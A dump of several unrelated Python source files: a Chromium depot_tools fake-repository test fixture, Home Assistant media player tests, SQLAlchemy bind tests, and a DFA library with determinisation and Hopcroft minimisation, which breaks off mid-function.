'open(\\'src/should_run\\', \\'w\\').write(\\'should_run\\')'],
'condition': 'true_var or True',
},
{
'action': ['python', '-c',
'open(\\'src/should_not_run\\', \\'w\\').write(\\'should_not_run\\')'],
'condition': 'false_var',
},
]""",
'origin': 'git/repo_7@1\n',
})
self._commit_git('repo_8', {
'DEPS': """
deps_os ={
'mac': {
'src/recursed_os_repo': '/repo_5',
},
'unix': {
'src/recursed_os_repo': '/repo_5',
},
}""",
'origin': 'git/repo_8@1\n',
})
self._commit_git('repo_9', {
'DEPS': """
deps = {
'src/repo8': '/repo_8',
# This entry should appear in flattened file,
# but not recursed into, since it's not
# in recursedeps.
'src/repo7': '/repo_7',
}
deps_os = {
'android': {
# This entry should only appear in flattened |deps_os|,
# not |deps|, even when used with |recursedeps|.
'src/repo4': '/repo_4',
}
}
recursedeps = [
'src/repo4',
'src/repo8',
]""",
'origin': 'git/repo_9@1\n',
})
self._commit_git('repo_10', {
'DEPS': """
deps = {
'src/repo9': '/repo_9',
# This entry should appear in flattened file,
# but not recursed into, since it's not
# in recursedeps.
'src/repo6': '/repo_6',
}
deps_os = {
'mac': {
'src/repo11': '/repo_11',
},
'ios': {
'src/repo11': '/repo_11',
}
}
recursedeps = [
'src/repo9',
'src/repo11',
]""",
'origin': 'git/repo_10@1\n',
})
self._commit_git('repo_11', {
'DEPS': """
deps = {
'src/repo12': '/repo_12',
}""",
'origin': 'git/repo_11@1\n',
})
self._commit_git('repo_12', {
'origin': 'git/repo_12@1\n',
})
self._fast_import_git('repo_12', """blob
mark :1
data 6
Hello
blob
mark :2
data 4
Bye
reset refs/changes/1212
commit refs/changes/1212
mark :3
author Bob <bob@example.com> 1253744361 -0700
committer Bob <bob@example.com> 1253744361 -0700
data 8
A and B
M 100644 :1 a
M 100644 :2 b
""")
self._commit_git('repo_13', {
'DEPS': """
deps = {
'src/repo12': '/repo_12',
}""",
'origin': 'git/repo_13@1\n',
})
self._commit_git('repo_13', {
'DEPS': """
deps = {
'src/repo12': '/repo_12@refs/changes/1212',
}""",
'origin': 'git/repo_13@2\n',
})
self._commit_git('repo_14', {
'DEPS': textwrap.dedent("""\
deps = {
'src/cipd_dep': {
'packages': [
{
'package': 'package0',
'version': '0.1',
},
],
'dep_type': 'cipd',
},
}"""),
'origin': 'git/repo_14@2\n'
})
class FakeRepoSkiaDEPS(FakeReposBase):
"""Simulates the Skia DEPS transition in Chrome."""
NB_GIT_REPOS = 5
DEPS_git_pre = """deps = {
'src/third_party/skia/gyp': '%(git_base)srepo_3',
'src/third_party/skia/include': '%(git_base)srepo_4',
'src/third_party/skia/src': '%(git_base)srepo_5',
}"""
DEPS_post = """deps = {
'src/third_party/skia': '%(git_base)srepo_1',
}"""
def populateGit(self):
# Skia repo.
self._commit_git('repo_1', {
'skia_base_file': 'root-level file.',
'gyp/gyp_file': 'file in the gyp directory',
'include/include_file': 'file in the include directory',
'src/src_file': 'file in the src directory',
})
self._commit_git('repo_3', { # skia/gyp
'gyp_file': 'file in the gyp directory',
})
self._commit_git('repo_4', { # skia/include
'include_file': 'file in the include directory',
})
self._commit_git('repo_5', { # skia/src
'src_file': 'file in the src directory',
})
# Chrome repo.
self._commit_git('repo_2', {
'DEPS': self.DEPS_git_pre % {'git_base': self.git_base},
'myfile': 'src/trunk/src@1'
})
self._commit_git('repo_2', {
'DEPS': self.DEPS_post % {'git_base': self.git_base},
'myfile': 'src/trunk/src@2'
})
class FakeRepoBlinkDEPS(FakeReposBase):
"""Simulates the Blink DEPS transition in Chrome."""
NB_GIT_REPOS = 2
DEPS_pre = 'deps = {"src/third_party/WebKit": "%(git_base)srepo_2",}'
DEPS_post = 'deps = {}'
def populateGit(self):
# Blink repo.
self._commit_git('repo_2', {
'OWNERS': 'OWNERS-pre',
'Source/exists_always': '_ignored_',
'Source/exists_before_but_not_after': '_ignored_',
})
# Chrome repo.
self._commit_git('repo_1', {
'DEPS': self.DEPS_pre % {'git_base': self.git_base},
'myfile': 'myfile@1',
'.gitignore': '/third_party/WebKit',
})
self._commit_git('repo_1', {
'DEPS': self.DEPS_post % {'git_base': self.git_base},
'myfile': 'myfile@2',
'.gitignore': '',
'third_party/WebKit/OWNERS': 'OWNERS-post',
'third_party/WebKit/Source/exists_always': '_ignored_',
'third_party/WebKit/Source/exists_after_but_not_before': '_ignored',
})
def populateSvn(self):
raise NotImplementedError()
class FakeReposTestBase(trial_dir.TestCase):
"""This is vaguely inspired by twisted."""
# Static FakeRepos instances. Lazy loaded.
CACHED_FAKE_REPOS = {}
# Override if necessary.
FAKE_REPOS_CLASS = FakeRepos
def setUp(self):
super(FakeReposTestBase, self).setUp()
if not self.FAKE_REPOS_CLASS in self.CACHED_FAKE_REPOS:
self.CACHED_FAKE_REPOS[self.FAKE_REPOS_CLASS] = self.FAKE_REPOS_CLASS()
self.FAKE_REPOS = self.CACHED_FAKE_REPOS[self.FAKE_REPOS_CLASS]
# No need to call self.FAKE_REPOS.setUp(), it will be called by the child
# class.
# Do not define tearDown(), since super's version does the right thing and
# self.FAKE_REPOS is kept across tests.
@property
def git_base(self):
"""Shortcut."""
return self.FAKE_REPOS.git_base
def checkString(self, expected, result, msg=None):
"""Prints the diffs to ease debugging."""
if expected != result:
# Strip the begining
while expected and result and expected[0] == result[0]:
expected = expected[1:]
result = result[1:]
# The exception trace makes it hard to read so dump it too.
if '\n' in result:
print result
self.assertEquals(expected, result, msg)
def check(self, expected, results):
"""Checks stdout, stderr, returncode."""
self.checkString(expected[0], results[0])
self.checkString(expected[1], results[1])
self.assertEquals(expected[2], results[2])
def assertTree(self, tree, tree_root=None):
"""Diff the checkout tree with a dict."""
if not tree_root:
tree_root = self.root_dir
actual = read_tree(tree_root)
diff = dict_diff(tree, actual)
if diff:
logging.debug('Actual %s\n%s' % (tree_root, pprint.pformat(actual)))
logging.debug('Expected\n%s' % pprint.pformat(tree))
logging.debug('Diff\n%s' % pprint.pformat(diff))
self.assertEquals(diff, {})
def mangle_git_tree(self, *args):
"""Creates a 'virtual directory snapshot' to compare with the actual result
on disk."""
result = {}
for item, new_root in args:
repo, rev = item.split('@', 1)
tree = self.gittree(repo, rev)
for k, v in tree.iteritems():
result[join(new_root, k)] = v
return result
def githash(self, repo, rev):
"""Sort-hand: Returns the hash for a git 'revision'."""
return self.FAKE_REPOS.git_hashes[repo][int(rev)][0]
def gittree(self, repo, rev):
"""Sort-hand: returns the directory tree for a git 'revision'."""
return self.FAKE_REPOS.git_hashes[repo][int(rev)][1]
def gitrevparse(self, repo):
"""Returns the actual revision for a given repo."""
return self.FAKE_REPOS._git_rev_parse(repo)
def main(argv):
fake = FakeRepos()
print 'Using %s' % fake.root_dir
try:
fake.set_up_git()
print('Fake setup, press enter to quit or Ctrl-C to keep the checkouts.')
sys.stdin.readline()
except KeyboardInterrupt:
trial_dir.TrialDir.SHOULD_LEAK.leak = True
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
|
"""Test the base functions of the media player."""
import asyncio
import base64
from http import HTTPStatus
from unittest.mock import patch
from homeassistant.components import media_player
from homeassistant.components.media_player.browse_media import BrowseMedia
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.const import ATTR_ENTITY_ID, STATE_OFF
from homeassistant.setup import async_setup_component
async def test_get_image(hass, hass_ws_client, caplog):
"""Test get image via WS command."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
client = await hass_ws_client(hass)
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
await client.send_json(
{
"id": 5,
"type": "media_player_thumbnail",
"entity_id": "media_player.bedroom",
}
)
msg = await client.receive_json()
assert msg["id"] == 5
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"]["content_type"] == "image/jpeg"
assert msg["result"]["content"] == base64.b64encode(b"image").decode("utf-8")
assert "media_player_thumbnail is deprecated" in caplog.text
async def test_get_image_http(hass, hass_client_no_auth):
"""Test get image via http command."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" not in state.attributes
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
resp = await client.get(state.attributes["entity_picture"])
content = await resp.read()
assert content == b"image"
async def test_get_image_http_remote(hass, hass_client_no_auth):
"""Test get image url via http command."""
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"media_image_remotely_accessible",
return_value=True,
):
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" in state.attributes
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
resp = await client.get(state.attributes["entity_picture_local"])
content = await resp.read()
assert content == b"image"
async def test_get_image_http_log_credentials_redacted(
hass, hass_client_no_auth, aioclient_mock, caplog
):
"""Test credentials are redacted when logging url when fetching image."""
url = "http://vi:pass@example.com/default.jpg"
with patch(
"homeassistant.components.demo.media_player.DemoYoutubePlayer.media_image_url",
url,
):
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" not in state.attributes
aioclient_mock.get(url, exc=asyncio.TimeoutError())
client = await hass_client_no_auth()
resp = await client.get(state.attributes["entity_picture"])
assert resp.status == HTTPStatus.INTERNAL_SERVER_ERROR
assert f"Error retrieving proxied image from {url}" not in caplog.text
assert (
"Error retrieving proxied image from "
f"{url.replace('pass', 'xxxxxxxx').replace('vi', 'xxxx')}"
) in caplog.text
async def test_get_async_get_browse_image(hass, hass_client_no_auth, hass_ws_client):
"""Test get browse image."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
entity_comp = hass.data.get("entity_components", {}).get("media_player")
assert entity_comp
player = entity_comp.get_entity("media_player.bedroom")
assert player
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_browse_image",
return_value=(b"image", "image/jpeg"),
):
url = player.get_browse_image_url("album", "abcd")
resp = await client.get(url)
content = await resp.read()
assert content == b"image"
async def test_media_browse(hass, hass_ws_client):
"""Test browsing media."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
client = await hass_ws_client(hass)
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_BROWSE_MEDIA,
), patch(
"homeassistant.components.media_player.MediaPlayerEntity.async_browse_media",
return_value=BrowseMedia(
media_class=media_player.MEDIA_CLASS_DIRECTORY,
media_content_id="mock-id",
media_content_type="mock-type",
title="Mock Title",
can_play=False,
can_expand=True,
),
) as mock_browse_media:
await client.send_json(
{
"id": 5,
"type": "media_player/browse_media",
"entity_id": "media_player.bedroom",
"media_content_type": "album",
"media_content_id": "abcd",
}
)
msg = await client.receive_json()
assert msg["id"] == 5
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"] == {
"title": "Mock Title",
"media_class": "directory",
"media_content_type": "mock-type",
"media_content_id": "mock-id",
"can_play": False,
"can_expand": True,
"children_media_class": None,
"thumbnail": None,
"not_shown": 0,
"children": [],
}
assert mock_browse_media.mock_calls[0][1] == ("album", "abcd")
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_BROWSE_MEDIA,
), patch(
"homeassistant.components.media_player.MediaPlayerEntity.async_browse_media",
return_value={"bla": "yo"},
):
await client.send_json(
{
"id": 6,
"type": "media_player/browse_media",
"entity_id": "media_player.bedroom",
}
)
msg = await client.receive_json()
assert msg["id"] == 6
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"] == {"bla": "yo"}
async def test_group_members_available_when_off(hass):
"""Test that group_members are still available when media_player is off."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
# Fake group support for DemoYoutubePlayer
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_GROUPING | media_player.SUPPORT_TURN_OFF,
):
await hass.services.async_call(
"media_player",
"turn_off",
{ATTR_ENTITY_ID: "media_player.bedroom"},
blocking=True,
)
state = hass.states.get("media_player.bedroom")
assert state.state == STATE_OFF
assert "group_members" in state.attributes
|
|
"""tests the "bind" attribute/argument across schema and SQL,
including the deprecated versions of these arguments"""
from sqlalchemy.test.testing import eq_
from sqlalchemy import engine, exc
from sqlalchemy import MetaData, ThreadLocalMetaData
from sqlalchemy import Integer, text
from sqlalchemy.test.schema import Table
from sqlalchemy.test.schema import Column
import sqlalchemy as sa
from sqlalchemy.test import testing
class BindTest(testing.TestBase):
def test_create_drop_explicit(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for bind in (
testing.db,
testing.db.connect()
):
for args in [
([], {'bind':bind}),
([bind], {})
]:
metadata.create_all(*args[0], **args[1])
assert table.exists(*args[0], **args[1])
metadata.drop_all(*args[0], **args[1])
table.create(*args[0], **args[1])
table.drop(*args[0], **args[1])
assert not table.exists(*args[0], **args[1])
def test_create_drop_err(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for meth in [
metadata.create_all,
metadata.drop_all,
table.create,
table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The MetaData "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign the MetaData's .bind to enable implicit execution.")
for meth in [
table.exists,
# future:
#table.create,
#table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The Table 'test_table' "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign this Table's .metadata.bind to enable implicit "
"execution.")
@testing.future
def test_create_drop_err2(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for meth in [
table.exists,
table.create,
table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The Table 'test_table' "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign this Table's .metadata.bind to enable implicit "
"execution.")
@testing.uses_deprecated()
def test_create_drop_bound(self):
for meta in (MetaData,ThreadLocalMetaData):
for bind in (
testing.db,
testing.db.connect()
):
metadata = meta()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.bind = bind
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
metadata = meta()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.bind = bind
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
if isinstance(bind, engine.Connection):
bind.close()
def test_create_drop_constructor_bound(self):
for bind in (
testing.db,
testing.db.connect()
):
try:
for args in (
([bind], {}),
([], {'bind':bind}),
):
metadata = MetaData(*args[0], **args[1])
table = Table('test_table', metadata,
Column('foo', Integer))
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
finally:
if isinstance(bind, engine.Connection):
bind.close()
def test_implicit_execution(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer),
test_needs_acid=True,
)
conn = testing.db.connect()
metadata.create_all(bind=conn)
try:
trans = conn.begin()
metadata.bind = conn
t = table.insert()
assert t.bind is conn
table.insert().execute(foo=5)
table.insert().execute(foo=6)
table.insert().execute(foo=7)
trans.rollback()
metadata.bind = None
assert conn.execute("select count(1) from test_table").scalar() == 0
finally:
metadata.drop_all(bind=conn)
def test_clauseelement(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.create_all(bind=testing.db)
try:
for elem in [
table.select,
lambda **kwargs: sa.func.current_timestamp(**kwargs).select(),
# func.current_timestamp().select,
lambda **kwargs:text("select * from test_table", **kwargs)
]:
for bind in (
testing.db,
testing.db.connect()
):
try:
e = elem(bind=bind)
assert e.bind is bind
e.execute().close()
finally:
if isinstance(bind, engine.Connection):
bind.close()
try:
e = elem()
assert e.bind is None
e.execute()
assert False
except exc.UnboundExecutionError, e:
assert str(e).endswith(
'is not bound and does not support direct '
'execution. Supply this statement to a Connection or '
'Engine for execution. Or, assign a bind to the '
'statement or the Metadata of its underlying tables to '
'enable implicit execution via this method.')
finally:
if isinstance(bind, engine.Connection):
bind.close()
metadata.drop_all(bind=testing.db)
|
|
"""
This module performs all basic DFA operations, without pyfst
"""
#!/usr/bin/python
from operator import attrgetter
from itertools import product
import copy
from alphabet import createalphabet
from collections import defaultdict
EPSILON = 0xffff
def TropicalWeight(param):
"""
Returns the emulated fst TropicalWeight
Args:
param (str): The input
Returns:
bool: The arc weight
"""
if param == (float('inf')):
return False
else:
return True
class DFAState:
"""The DFA statess"""
def __init__(self, sid=None):
"""
Initialization function
Args:
sid (int): The state identifier
Returns:
None
"""
self.final = False
self.initial = False
self.stateid = sid
self.arcs = []
def __iter__(self):
"""Iterator"""
return iter(self.arcs)
class DFAArc:
"""The DFA transition"""
def __init__(self, srcstate_id, nextstate_id, ilabel=None):
"""
The initialization function
Args:
srcstate_id (int): The source state identifier
nextstate_id (int): The destination state identifier
ilabel (str): The symbol corresponding to character for the transition
"""
self.srcstate = srcstate_id
self.nextstate = nextstate_id
self.ilabel = ilabel
class syms:
"""The DFA accepted symbols"""
def __init__(self):
"""Initialize symbols"""
self.symbols = {}
self.reversesymbols = {}
def __getitem__(self, char):
"""
Finds a symbol identifier based on the input character
Args:
char (str): The symbol character
Returns:
int: The retrieved symbol identifier
"""
return self.reversesymbols[char]
def __setitem__(self, char, num):
"""
Sets a symbol
Args:
char (str): The symbol character
num (int): The symbol identifier
Returns:
None
"""
self.symbols[num] = char
self.reversesymbols[char] = num
def find(self, num):
"""
Finds a symbol based on its identifier
Args:
num (int): The symbol identifier
Returns:
str: The retrieved symbol
"""
return self.symbols[num]
def items(self):
"""Returns all stored symbols
Args:
None
Returns:
dict:The included symbols
"""
return self.symbols
class PythonDFA(object):
"""A DFA implementation that uses the
same interface with python symautomata"""
def __init__(self, alphabet=createalphabet()):
"""
Args:
alphabet (list): The imput alphabet
Returns:
None
"""
self.states = []
self.alphabet = alphabet
self.nfa = False
num = 1
self.isyms = syms()
self.osyms = syms()
for char in alphabet + [EPSILON]:
self.isyms.__setitem__(char, num)
self.osyms.__setitem__(char, num)
num = num + 1
def __str__(self):
"""Describes DFA object"""
return "This is a python DFA object with " + `len(self.states)` + " states"
def __getitem__(self, state):
"""
Retrieves a state
Args:
state (int): State identifier
Returns:
DFA state: The selected dfa state
"""
return self.states[state]
def __setitem__(self, state, newstate=None):
"""
Sets a new state
Args:
state (int): State identifier
newstate (DFA State): The selected dfa state
Returns:
None
"""
self.states[state] = newstate
def define(self):
"""If DFA is empty, create a sink state"""
if len(self.states) == 0:
for char in self.alphabet:
self.add_arc(0, 0, char)
self[0].final = False
def add_state(self):
"""Adds a new state"""
sid = len(self.states)
self.states.append(DFAState(sid))
return sid
def add_arc(self, src, dst, char):
"""Adds a new Arc
Args:
src (int): The source state identifier
dst (int): The destination state identifier
char (str): The character for the transition
Returns:
None
"""
# assert type(src) == type(int()) and type(dst) == type(int()), \
# "State type should be integer."
# assert char in self.I
#
#print self.states
#print src
for s_idx in [src, dst]:
if s_idx >= len(self.states):
for i in range(len(self.states), s_idx + 1):
self.states.append(DFAState(i))
for arc in self.states[src].arcs:
if arc.ilabel == self.isyms.__getitem__(char) or char == EPSILON:
self.nfa = True
break
self.states[src].arcs.append(
DFAArc(src, dst, self.isyms.__getitem__(char)))
def fixminimized(self, alphabet):
"""
After pyfst minimization,
all unused arcs are removed,
and all sink states are removed.
However this may break compatibility.
Args:
alphabet (list): The input alphabet
Returns:
None
"""
return
# endstate = self.add_state()
# for state in self.states:
# for char in alphabet:
# found = 0
# for arc in state.arcs:
# if self.isyms.find(arc.ilabel) == char:
# found = 1
# break
# if found == 0:
# self.add_arc(state.stateid, endstate, char)
#
# self[endstate].final = False
#
# for char in alphabet:
# self.add_arc(endstate, endstate, char)
def _addsink(self, alphabet):
"""
Adds a sink state
Args:
alphabet (list): The input alphabet
Returns:
None
"""
endstate = len(list(self.states))
for state in self.states:
for char in alphabet:
found = 0
for arc in state.arcs:
if self.isyms.find(arc.ilabel) == char:
found = 1
break
if found == 0:
self.add_arc(state.stateid, endstate, char)
self[endstate].final = False
for char in alphabet:
self.add_arc(endstate, endstate, char)
def consume_input(self, inp):
"""
Return True/False if the machine accepts/reject the input.
Args:
inp (str): input string to be consumed
Returns:
bool: A true or false value depending on if the DFA
accepts the provided input
"""
cur_state = sorted(
self.states,
key=attrgetter('initial'),
reverse=True)[0]
while len(inp) > 0:
found = False
for arc in cur_state.arcs:
if self.isyms.find(arc.ilabel) == inp[0]:
cur_state = self[arc.nextstate]
inp = inp[1:]
found = True
break
if not found:
return False
return cur_state.final
def empty(self):
"""
Return True if the DFA accepts the empty language.
"""
# self.minimize()
return len(list(self.states)) == 0
def complement(self, alphabet):
"""
Returns the complement of DFA
Args:
alphabet (list): The input alphabet
Returns:
None
"""
states = sorted(self.states, key=attrgetter('initial'), reverse=True)
for state in states:
if state.final:
state.final = False
else:
state.final = True
def init_from_acceptor(self, acceptor):
"""
Adds a sink state
Args:
alphabet (list): The input alphabet
Returns:
None
"""
self.states = copy.deepcopy(acceptor.states)
self.alphabet = copy.deepcopy(acceptor.alphabet)
self.osyms = copy.deepcopy(acceptor.osyms)
self.isyms = copy.deepcopy(acceptor.isyms)
def save(self, txt_fst_file_name):
"""
Save the machine in the openFST format in the file denoted by
txt_fst_file_name.
Args:
txt_fst_file_name (str): The output file
Returns:
None
"""
output_filename = open(txt_fst_file_name, 'w+')
states = sorted(self.states, key=attrgetter('initial'), reverse=True)
for state in states:
for arc in state.arcs:
itext = self.isyms.find(arc.ilabel)
otext = self.osyms.find(arc.ilabel)
output_filename.write(
'{}\t{}\t{}\t{}\n'.format(
state.stateid,
arc.nextstate,
itext.encode('hex'),
otext.encode('hex')))
if state.final:
output_filename.write('{}\n'.format(state.stateid))
output_filename.close()
def load(self, txt_fst_file_name):
"""
Save the transducer in the text file format of OpenFST.
The format is specified as follows:
arc format: src dest ilabel olabel [weight]
final state format: state [weight]
lines may occur in any order except initial state must be first line
Args:
txt_fst_file_name (str): The input file
Returns:
None
"""
with open(txt_fst_file_name, 'r') as input_filename:
for line in input_filename:
line = line.strip()
split_line = line.split()
if len(split_line) == 1:
self[int(split_line[0])].final = True
else:
self.add_arc(int(split_line[0]), int(split_line[1]),
split_line[2].decode('hex'))
def minimize(self):
"""Minimizes the DFA using Hopcroft algorithm"""
self.hopcroft()
def intersect(self, other):
"""Constructs an unminimized DFA recognizing
the intersection of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the intersect operation
Returns:
Returns:
DFA: The resulting DFA
"""
operation = bool.__and__
self.cross_product(other, operation)
return self
def __and__(self, other):
"""Constructs an unminimized DFA recognizing
the intersection of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the intersect operation
Returns:
DFA: The resulting DFA
"""
self.intersect(other)
return self
def symmetric_difference(self, other):
"""Constructs an unminimized DFA recognizing
the symmetric difference of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the symmetric difference operation
Returns:
DFA: The resulting DFA
"""
operation = bool.__xor__
self.cross_product(other, operation)
return self
def union(self, other):
"""Constructs an unminimized DFA recognizing the union of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the union operation
Returns:
DFA: The resulting DFA
"""
operation = bool.__or__
self.cross_product(other, operation)
return self
def __or__(self, other):
"""Constructs an unminimized DFA recognizing the union of the languages of two given DFAs.
Args:
other (DFA): The other DFA that will be used
for the union operation
Returns:
DFA: The resulting DFA
"""
self.union(other)
return self
def _epsilon_closure(self, state):
"""
Returns the \epsilon-closure for the state given as input.
"""
closure = set([state.stateid])
stack = [state]
while True:
if not stack:
break
s = stack.pop()
for arc in s:
if self.isyms.find(arc.ilabel) != EPSILON or \
arc.nextstate in closure:
continue
closure.add(arc.nextstate)
stack.append(self.states[arc.nextstate])
return closure
def determinize(self):
"""
Transforms a Non Deterministic DFA into a Deterministic
Args:
None
Returns:
DFA: The resulting DFA
Creating an equivalent DFA is done using the standard algorithm.
A nice description can be found in the book:
Harry R. Lewis and Christos H. Papadimitriou. 1998.
E
print target_dfa_statelements of the Theory of Computation.
"""
# Compute the \epsilon-closure for all states and save it in a diagram
epsilon_closure = {}
for state in self.states:
sid = state.stateid
epsilon_closure[sid] = self._epsilon_closure(state)
# Get a transition diagram to speed up computations
trans_table = {}
for state in self.states:
trans_table[state.stateid] = defaultdict(set)
for arc in state:
char = self.isyms.find(arc.ilabel)
trans_table[state.stateid][char].add(arc.nextstate)
# is_final function:
# Given a set of nfa states representing a dfa_state return 1 if the
# corresponding DFA state is a final state, i.e. if any of the
# corresponding NFA states are final.
is_final = lambda nfa_states, dfa_state: True \
if sum([ int(nfa_states[x].final) for x in dfa_state ]) >= 1 \
else False
# Precomputation is over, start executing the conversion algorithm
state_idx = 1
nfa_states = copy.deepcopy(self.states)
self.states = []
# Initialize the new DFA state list
self.add_state()
new_initial = epsilon_closure[nfa_states[0].stateid]
self.states[0].final = is_final(nfa_states, new_initial)
dfa_state_idx_map = { frozenset(new_initial) : 0 }
stack = [new_initial]
while True:
# Iterate until all added DFA states are processed.
if not stack:
break
# This is a set of states from the NFA
src_dfa_state = stack.pop()
src_dfa_state_idx = dfa_state_idx_map[frozenset(src_dfa_state)]
for char in self.alphabet:
# Compute the set of target states
target_dfa_state = set([])
for nfa_state in src_dfa_state:
next_states = \
set([y for x in trans_table[nfa_state][char] \
for y in epsilon_closure[x] ])
target_dfa_state.update(next_states)
# If the computed state set is not part of our new DFA add it,
# along with the transition for the current character.
if frozenset(target_dfa_state) not in dfa_state_idx_map:
self.add_state()
dfa_state_idx_map[frozenset(target_dfa_state)] = state_idx
self.states[state_idx].final = is_final(nfa_states,
target_dfa_state)
state_idx += 1
stack.append(target_dfa_state)
dst_state_idx = dfa_state_idx_map[frozenset(target_dfa_state)]
self.add_arc(src_dfa_state_idx, dst_state_idx, char)
return self
def invert(self):
"""Inverts the DFA final states"""
for state in self.states:
if state.final:
state.final = False
else:
state.final = True
def difference(self, other):
"""Performs the Diff operation between two atomata
Args:
other (DFA): The other DFA that will be used
for the difference operation
Returns:
DFA: The resulting DFA
"""
other.invert()
self.intersect(other)
return self
def __sub__(self, other):
"""Performs the Diff operation between two atomata
Args:
other (DFA): The other DFA that will be used
for the difference operation
Returns:
DFA: The resulting DFA
"""
self.difference(other)
return self
def hopcroft(self):
"""
Performs the Hopcroft minimization algorithm
Args:
None
Returns:
DFA: The minimized input DFA
"""
def _getset(testset, partition):
"""
Checks if a set is in a partition
Args:
testset (set): The examined set
partition (list): A list of sets
Returns:
bool: A value indicating if it is a member or not
"""
for part in partition:
if set(testset) == set(part):
return True
return None
def _create_transitions_representation(graph):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
Args:
graph (DFA): The input dfa
state (DFA state): The examined state
Returns:
dict: The generated transition map
"""
return {x.stateid:{self.isyms.find(arc.ilabel): arc.nextstate \
for arc in x} for x in graph.states}
def _create_reverse_transitions_representation(graph):
"""
In order to speedup the transition iteration using
the alphabet, the function creates an index
Args:
graph (DFA): The input dfa
state (DFA state): The examined state
Returns:
dict: The generated transition map
"""
return {x.stateid: {self.isyms.find(arc.ilabel): arc.nextstate \
for arc in x} for x in graph.states}
def _reverse_to_source(target, group1):
"""
Args:
target (dict): A table containing the reverse transitions for each state
group1 (list): A group of states
Return:
Set: A set of states for which there is a transition with the states of the group
"""
new_group = []
for dst in group1:
new_group += target[dst]
return set(new_group)
def _get_group_from_state(groups, sid):
"""
Args:
sid (int): The state identifier
Return:
int: The group identifier that the state belongs
"""
for index, selectgroup in enumerate(groups):
if sid in selectgroup:
return index
def _delta(graph, cur_state, char):
"""
Function describing the transitions
Args:
graph (DFA): The DFA states
cur_state (DFA state): The DFA current state
char (str):: The char that will be used for the transition
Return:
DFA Node: The next state
"""
for arc in cur_state.arcs:
if graph.isyms.find(arc.ilabel) == char:
return graph[arc.nextstate]
def _partition_group(bookeeping, group):
"""
Args:
group (list): A group of states
Return:
tuple: A set of two groups
"""
for (group1, group2) in bookeeping:
if group & group1 != set() and not group.issubset(group1):
new_g1 = group & group1
new_g2 = group - group1
return (new_g1, new_g2)
if group & group2 != set() and not group.issubset(group2):
new_g1 = group & group2
new_g2 = group - group2
return (new_g1, new_g2)
assert False, "Unmatched group partition"
def _object_set_to_state_list(objectset):
"""
Args:
objectset (list): A list of all the DFA states (as objects)
Return:
list: A list of all the DFA states (as identifiers)
"""
return [state.stateid for state in objectset]
def _get_accepted(graph):
"""
Find the accepted states
Args:
graph (DFA): The DFA states
Return:
list: Returns the list of the accepted states
"""
return [state for state in graph \
if state.final != TropicalWeight(float('inf'))]
graph = self
# Find Q
set_q = set(_object_set_to_state_list(graph.states))
# We will work with states addresses here instead of states stateid for
# more convenience
set_f = set(_object_set_to_state_list(_get_accepted(graph)))
# Perform P := {F, Q-F}
set_nf = set_q.copy() - set_f.copy()
groups = [set_f.copy(), set_nf.copy()]
bookeeping = [(set_f, set_nf)]
